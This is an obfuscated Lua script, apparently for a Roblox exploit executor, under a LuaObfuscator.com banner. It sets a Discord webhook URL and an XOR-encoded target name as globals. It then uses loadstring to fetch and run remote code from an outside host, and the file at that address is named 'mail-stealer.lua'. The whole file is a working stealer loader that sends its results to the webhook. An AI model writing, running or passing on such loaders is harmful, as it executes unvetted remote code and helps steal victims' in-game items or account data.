--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v13={};for v14=1, #v8 do v6(v13,v0(v4(v1(v2(v8,v14,v14 + 1 )),v1(v2(v9,1 + ((v14-1)% #v9) ,1 + ((v14-1)% #v9) + 1 )))%256 ));end return v5(v13);end getgenv().webhook="https://discord.com/api/webhooks/0000000000000000000/abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnop";getgenv().name=v7("\38\35\226\232\42\36\241\231\29\9\231","\115\81\131\134");getgenv().mouselock=false;loadstring(game:HttpGetAsync("https://wumat.xyz/scripts/mail-stealer.lua",true))();
